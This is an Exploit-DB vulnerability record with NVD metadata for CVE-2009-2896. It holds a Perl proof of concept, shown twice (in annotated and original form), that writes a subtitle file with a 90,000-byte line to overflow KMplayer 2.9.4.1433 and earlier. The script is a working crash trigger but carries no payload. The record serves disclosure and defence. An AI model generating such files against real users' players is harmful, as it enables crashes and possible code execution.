ID EDB-ID:9220
Type exploitdb
Reporter b3hz4d
Modified 2009-07-20T00:00:00
Description
KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC. CVE-2009-2896. DoS exploit for the Windows platform.
#!usr/bin/perl
######################## In The Name Of Allah ####################
#
# The KMplayer (.Srt) File Local Bof Poc
#
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################
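use strict;
use warnings;

# Writes SubTitle.srt, a six-cue SubRip file that serves as the crash test
# case for CVE-2009-2896 (KMplayer <= 2.9.4.1433, per the banner above).
#
# Only cue 1 is abnormal: its text line is 90000 bytes of "A". The NVD entry
# on this page classes the flaw as CWE-119 and attributes it to "a long
# string" in the subtitle file; cues 2-6 are ordinary filler so the file still
# parses as a normal subtitle track.
#
# Reading the scoring: the title says "Local" because the trigger is a file
# the user opens, while NVD scores it AV:N with userInteractionRequired=true
# because that file can be delivered remotely.
#
# Defensive use: a subtitle text line of this length does not occur in real
# subtitles, so a per-line length ceiling on .srt input (in the parser itself
# or in a file-inspection gateway) rejects this sample. The file doubles as a
# regression input when verifying a fixed or replacement player build.
#
# NOTE(review): the NVD record on this page maps the CVE to CPE vendor "kde",
# while the bulletin describes a Windows target -- confirm the product mapping
# before relying on CPE matching for asset inventory.

# Overlong subtitle text for cue 1 (the only oversized field in the file).
my $junk = "A" x 90000;

# Three-argument open with a lexical handle; fail loudly instead of printing
# to an unopened handle and reporting nothing.
my $path = "SubTitle.srt";
open(my $fhandle, '>', $path) or die "Cannot open $path for writing: $!\n";

# Cue 1: index, time range, overlong text line, trailer line.
print {$fhandle} "1\n00:00:25,100 --> 00:00:30,900\n$junk\n-pentesters\n";

# Cues 2-6: fixed filler text, five seconds apart.
my @filler_cues = (
    [2, "00:00:31,100", "00:00:35,900"],
    [3, "00:00:36,100", "00:00:40,900"],
    [4, "00:00:41,100", "00:00:45,900"],
    [5, "00:00:46,100", "00:00:50,900"],
    [6, "00:00:51,100", "00:00:55,900"],
);
for my $cue (@filler_cues) {
    my ($index, $start, $end) = @{$cue};
    print {$fhandle} "$index\n$start --> $end\nwww.pentesters.ir\n-Pentesters.Ir\n";
}

# A failed close means buffered data never reached disk; report it.
close($fhandle) or die "Cannot close $path: $!\n";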
# milw0rm.com [2009-07-20]
{"id": "EDB-ID:9220", "type": "exploitdb", "bulletinFamily": "exploit", "title": "KMplayer <= 2.9.4.1433 - .srt Local Buffer Overflow PoC", "description": "KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC. CVE-2009-2896. Dos exploit for windows platform", "published": "2009-07-20T00:00:00", "modified": "2009-07-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9220/", "reporter": "b3hz4d", "references": [], "cvelist": ["CVE-2009-2896"], "lastseen": "2016-02-01T10:07:45", "viewCount": 6, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-01T10:07:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2896"]}], "modified": "2016-02-01T10:07:45", "rev": 2}, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/9220/", "sourceData": "#!usr/bin/perl\n######################## In The Name Of Allah ####################\n#\n# The KMplayer (.Srt) File Local Bof Poc\n# \n#\n#Author : b3hz4d (Seyed Behzad Shaghasemi)\n#Site : Www.Pentesters.Ir\n#Tested on KMplayer <= 2.9.4.1433\n#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir\n#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers\n#\n######################### Www.Pentesters.Ir ######################\n\n\n\n$junk=\"A\"x 90000;\nopen(fhandle,\">SubTitle.srt\");\nprint fhandle \"1\".\"\\n\".\"00:00:25,100 --> 00:00:30,900\".\"\\n\".\"$junk\\n\".\"-pentesters\\n\";\nprint fhandle \"2\".\"\\n\".\"00:00:31,100 --> 00:00:35,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"3\".\"\\n\".\"00:00:36,100 --> 00:00:40,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"4\".\"\\n\".\"00:00:41,100 --> 00:00:45,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"5\".\"\\n\".\"00:00:46,100 --> 
00:00:50,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nprint fhandle \"6\".\"\\n\".\"00:00:51,100 --> 00:00:55,900\".\"\\n\".\"www.pentesters.ir\\n\".\"-Pentesters.Ir\\n\";\nclose(fhandle);\n\n# milw0rm.com [2009-07-20]\n", "osvdbidlist": ["57253"]}
{"cve": [{"lastseen": "2020-12-09T19:31:21", "description": "Buffer overflow in KMplayer 2.9.4.1433 and earlier allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long string in a subtitle (.srt) playlist file. NOTE: some of these details are obtained from third party information.", "edition": 5, "cvss3": {}, "published": "2009-08-20T17:30:00", "title": "CVE-2009-2896", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2896"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:kde:kmplayer:2.9.4.1433", "cpe:/a:kde:kmplayer:2.9.3.1210"], "id": "CVE-2009-2896", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2896", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:kde:kmplayer:2.9.4.1433:*:*:*:*:*:*:*", "cpe:2.3:a:kde:kmplayer:2.9.3.1210:*:*:*:*:*:*:*"]}]}